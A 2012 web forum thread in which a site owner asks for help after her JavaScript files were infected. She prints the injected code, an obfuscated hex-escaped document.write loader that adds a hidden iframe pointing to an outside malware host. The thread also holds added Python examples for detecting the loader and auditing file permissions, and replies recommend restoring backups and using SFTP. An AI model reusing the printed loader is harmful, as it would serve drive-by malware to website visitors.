Lisa23 Posted July 4, 2012

Hi guys, my website has just been hacked. Google is showing the red warning (Warning: Something's Not Right Here! www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.), stating the site has been trying to access these two sites:

http://bentley.poststreetdental.com/...f48be84d67654d
http://mazda.georgewkohn.com/direct....f48be84d67654d

I have now found that a lot of my JS files have this code at the bottom; when I remove it, it minimises the number of errors in the Chrome console (Inspect Element). Does anyone know if someone actually logged in to my FTP, accessed the JS files and pasted that code into them, or if it is some sort of program that wrote it?

var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x36\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]);

At the moment I am going through every single file and deleting that line of code, but I am not sure if it might be something else, or if someone has a way of accessing my FTP. I've changed the password. Any suggestions? Do I just delete the code in the JS files, or should I look for something else on the server?

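The snippet in the post above is an array of hex-escaped strings whose first element is handed to `document.write`. As an added example (not part of the original post), this Python sketch decodes such loaders as plain text, reports the hidden iframe host, and finds every `.js` file under a directory that carries one. All function names are hypothetical, and the sample is constructed with a placeholder `.invalid` host.

```python
import os
import re
from urllib.parse import urlparse

# Loader shape from the post: var _0xNNNN=["\x..","\x.."];document[_0xNNNN[1]](_0xNNNN[0]);
LOADER_RE = re.compile(
    r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\]\s*;\s*'
    r'document\[\1\[\d+\]\]\(\1\[\d+\]\)\s*;?', re.DOTALL)
STRING_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
SRC_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']([^"\']+)', re.IGNORECASE)

def decode_hex_escapes(literal):
    """Decode \\xNN escapes as text; no JavaScript is ever evaluated."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), literal)

def analyse(js_text):
    """Return (findings, cleaned_text) for one JavaScript source string."""
    findings = []
    for m in LOADER_RE.finditer(js_text):
        decoded = [decode_hex_escapes(s) for s in STRING_RE.findall(m.group(2))]
        hosts = {urlparse(u).hostname for d in decoded for u in SRC_RE.findall(d)}
        findings.append({"variable": m.group(1), "decoded": decoded,
                         "iframe_hosts": sorted(h for h in hosts if h),
                         "hidden": any("display:none" in d.replace(" ", "") for d in decoded)})
    if not findings:
        return findings, js_text
    return findings, LOADER_RE.sub("", js_text).rstrip() + "\n"

def scan_tree(root):
    """Map each .js file under root that contains a loader to its findings."""
    hits = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found, _cleaned = analyse(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample (not the payload from the post); the host is a placeholder.
def hex_escape(text):
    return "".join("\\x%02X" % ord(c) for c in text)

SAMPLE_HTML = ('<div style="display:none"><iframe src='
               '"http://injected.example.invalid/direct.php?page=0"></iframe></div>')
SAMPLE_JS = ('function menu(){return 1;}\n'
             'var _0x1a2b=["%s","%s"];document[_0x1a2b[1]](_0x1a2b[0]);\n'
             % (hex_escape(SAMPLE_HTML), hex_escape("write")))
```

`scan_tree` only matches this one loader shape, so an empty result does not show that the rest of the web root is clean.
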
haku Posted July 4, 2012

Your best bet is to wipe all the files from your web root and upload a backup. Also, FTP is insecure as it submits your password unencrypted. You should use SFTP, which does the file transfers over SSH, which is an encrypted protocol. You may need to have your host enable this for you though, as some do not enable it by default.

Lisa23 Posted July 4, 2012 (Author)

Thanks for your reply. So that code being pasted into some JS files, does that mean they actually logged in to the server? Or did they send some sort of program that bypasses hosting security?

haku Posted July 4, 2012

Could be either. This is why you are best off wiping everything and re-installing from a backup. This will ensure that there are no files in your web directory that you didn't put there.

Lisa23 Posted July 4, 2012 (Author)

Scary. OK, I've changed my FTP password, but if you are saying that it could be someone that logged in (password changed now) but a program that bypassed security, if I upload the backup, how can I prevent the same from happening if it is a program that's bypassing security? Very scared. I know a lot of people use an htaccess file to secure their site. I don't know much, so I am scared to change mine. Do you recommend any htaccess script?

haku Posted July 4, 2012

My biggest recommendation is just to stop using FTP. Also, you should look at your file permissions, and make sure files are not writable by anyone other than the file owner.

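One way to carry out the permission check recommended in the post above, as an added example that is not part of the original thread: walk the web root on a POSIX host and list every file or directory that group or other users can write to, together with the owner-only mode it would have after tightening. The function name and the `fix` switch are hypothetical.

```python
import os
import stat

LOOSE_BITS = stat.S_IWGRP | stat.S_IWOTH  # write permission for group and others

def audit_writable(web_root, fix=False):
    """Return {path: (current_mode, owner_only_mode)} for loosely writable entries.

    With fix=True the group/other write bits are also removed via chmod.
    """
    findings = {}
    for dirpath, dirnames, filenames in os.walk(web_root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            info = os.lstat(path)
            if stat.S_ISLNK(info.st_mode):
                continue  # skip symlinks: chmod would act on the link target
            mode = stat.S_IMODE(info.st_mode)
            if mode & LOOSE_BITS:
                tightened = mode & ~LOOSE_BITS
                findings[path] = (oct(mode), oct(tightened))
                if fix:
                    os.chmod(path, tightened)
    return findings
```

Run it once without `fix` to review the list first; the web root itself is not checked, only what is inside it.
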
kicken Posted July 4, 2012

"... but a program that bypassed security, if i upload the back up how can i prevent the same from happening if is program thats bypassing security?"

If it were a case of the host being hacked, the only thing really would be to change hosts. However, it is far more likely that the problem is the result of your FTP password being stolen (keylogger, sniffed, virus, etc.), or the file being modified via a vulnerability in something of yours (PHP script, CMS, etc.). People always want to blame the host when something like this happens, but rarely is it ever actually the host's fault.